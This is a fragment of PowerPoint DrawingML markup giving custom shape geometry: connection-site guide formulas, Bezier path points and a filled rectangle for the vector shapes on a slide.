              <a:gd name="connsiteY9" fmla="*/ 1944748 h 2204007"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1794705 h 2204007"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1672878 h 2204007"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1610325 h 2204007"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1563229 h 2204007"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1504249 h 2204007"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1422130 h 2204007"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1357875 h 2204007"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301945 h 2204007"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1237926 h 2204007"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1089882 h 2204007"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 654437 h 2204007"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 355731 h 2204007"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 156104 h 2204007"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 127810 h 2204007"/>
              <a:gd name="connsiteX25" fmla="*/ 9142920 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 58582 h 2204007"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1799 h 2204007"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 859 h 2203067"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2203067 h 2203067"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2203067 h 2203067"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2178993 h 2203067"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2165896 h 2203067"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2090835 h 2203067"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2050956 h 2203067"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2041094 h 2203067"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1994596 h 2203067"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1943808 h 2203067"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1793765 h 2203067"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1671938 h 2203067"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1609385 h 2203067"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1562289 h 2203067"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1503309 h 2203067"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1421190 h 2203067"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1356935 h 2203067"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1301005 h 2203067"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1236986 h 2203067"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1088942 h 2203067"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1088942 h 2203067"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 653497 h 2203067"/>
              <a:gd name="connsiteX22" fmla="*/ 8203042 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 354791 h 2203067"/>
              <a:gd name="connsiteX23" fmla="*/ 8682888 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 155164 h 2203067"/>
              <a:gd name="connsiteX24" fmla="*/ 8943475 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 126870 h 2203067"/>
              <a:gd name="connsiteX25" fmla="*/ 9142920 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 57642 h 2203067"/>
              <a:gd name="connsiteX26" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 859 h 2203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9288370" h="2203067">
                <a:moveTo>
                  <a:pt x="9285549" y="859"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9288065" y="743433"/>
                  <a:pt x="9285854" y="1460493"/>
                  <a:pt x="9288370" y="2203067"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2203067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55380" y="2178993"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="73723" y="2172204"/>
                  <a:pt x="91063" y="2167343"/>
                  <a:pt x="106098" y="2165896"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="218614" y="2113687"/>
                  <a:pt x="311471" y="2109992"/>
                  <a:pt x="370723" y="2090835"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="461604" y="2050956"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="511794" y="2042666"/>
                  <a:pt x="630174" y="2045052"/>
                  <a:pt x="671860" y="2041094"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="831551" y="2029819"/>
                  <a:pt x="796957" y="2010095"/>
                  <a:pt x="859506" y="1994596"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="925148" y="1977667"/>
                  <a:pt x="982441" y="1946437"/>
                  <a:pt x="1056432" y="1943808"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1141460" y="1949662"/>
                  <a:pt x="1229014" y="1839077"/>
                  <a:pt x="1336276" y="1793765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1443537" y="1748453"/>
                  <a:pt x="1618734" y="1681551"/>
                  <a:pt x="1700002" y="1671938"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1770796" y="1652622"/>
                  <a:pt x="1886491" y="1607508"/>
                  <a:pt x="1925247" y="1609385"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1979773" y="1591110"/>
                  <a:pt x="1997283" y="1579968"/>
                  <a:pt x="2056727" y="1562289"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2118428" y="1524336"/>
                  <a:pt x="2272492" y="1514307"/>
                  <a:pt x="2281913" y="1503309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2313559" y="1509407"/>
                  <a:pt x="2384024" y="1432152"/>
                  <a:pt x="2402058" y="1421190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2444082" y="1402817"/>
                  <a:pt x="2459748" y="1386764"/>
                  <a:pt x="2522221" y="1356935"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2583351" y="1338655"/>
                  <a:pt x="2592153" y="1324759"/>
                  <a:pt x="2689698" y="1301005"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2846360" y="1290467"/>
                  <a:pt x="2933220" y="1259857"/>
                  <a:pt x="3001703" y="1236986"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3437947" y="1088942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4209051" y="1088942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7197317" y="653497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8203042" y="354791"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8405521" y="58626"/>
                  <a:pt x="8461507" y="221706"/>
                  <a:pt x="8682888" y="155164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8730870" y="183830"/>
                  <a:pt x="8822250" y="173420"/>
                  <a:pt x="8943475" y="126870"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9095367" y="26013"/>
                  <a:pt x="9069294" y="84165"/>
                  <a:pt x="9142920" y="57642"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9206215" y="62810"/>
                  <a:pt x="9198626" y="-8563"/>
                  <a:pt x="9285549" y="859"/>
                </a:cubicBez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DC864E-A348-4E87-AE2E-1861FE991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9546" y="441736"/>
            <a:ext cx="10792612" cy="5426887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEEE9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B42EA8D-47D0-4305-A5B1-0BD484F3A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496109" y="-2127221"/>
            <a:ext cx="5199782" cy="10540945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 7596066 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 7596068 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 7916119 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 2810340 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY46" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX47" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY47" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX48" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY48" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX49" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY49" fmla="*/ 7956458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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 7596066 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 7596068 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 7916119 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY46" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX47" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY47" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX48" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY48" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX49" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY49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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123786 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 7596066 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 7916119 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY46" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX47" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY47" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX48" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY48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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 7916119 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY46" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX47" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY47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6 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 4850104 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY45" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX46" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY46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5 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 3145747 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY44" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX45" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY45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5 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10239915 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4123785 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX35" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY35" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX36" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY36" fmla="*/ 9043781 h 10695515"/>
              <a:gd name="connsiteX37" fmla="*/ 19986 w 4123786"/>
              <a:gd name="connsiteY37" fmla="*/ 8991028 h 10695515"/>
              <a:gd name="connsiteX38" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY38" fmla="*/ 8936768 h 10695515"/>
              <a:gd name="connsiteX39" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY39" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX40" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY40" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX41" fmla="*/ 19292 w 4123786"/>
              <a:gd name="connsiteY41" fmla="*/ 8064088 h 10695515"/>
              <a:gd name="connsiteX42" fmla="*/ 6414 w 4123786"/>
              <a:gd name="connsiteY42" fmla="*/ 8009276 h 10695515"/>
              <a:gd name="connsiteX43" fmla="*/ 862 w 4123786"/>
              <a:gd name="connsiteY43" fmla="*/ 7956458 h 10695515"/>
              <a:gd name="connsiteX44" fmla="*/ 0 w 4123786"/>
              <a:gd name="connsiteY44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5 w 4123786"/>
              <a:gd name="connsiteY29" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX30" fmla="*/ 4090258 w 4123786"/>
              <a:gd name="connsiteY30" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX31" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY31" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX32" fmla="*/ 4072751 w 4123786"/>
              <a:gd name="connsiteY32" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX33" fmla="*/ 68003 w 4123786"/>
              <a:gd name="connsiteY33" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX34" fmla="*/ 30530 w 4123786"/>
              <a:gd name="connsiteY34" fmla="*/ 10659953 h 10695515"/>
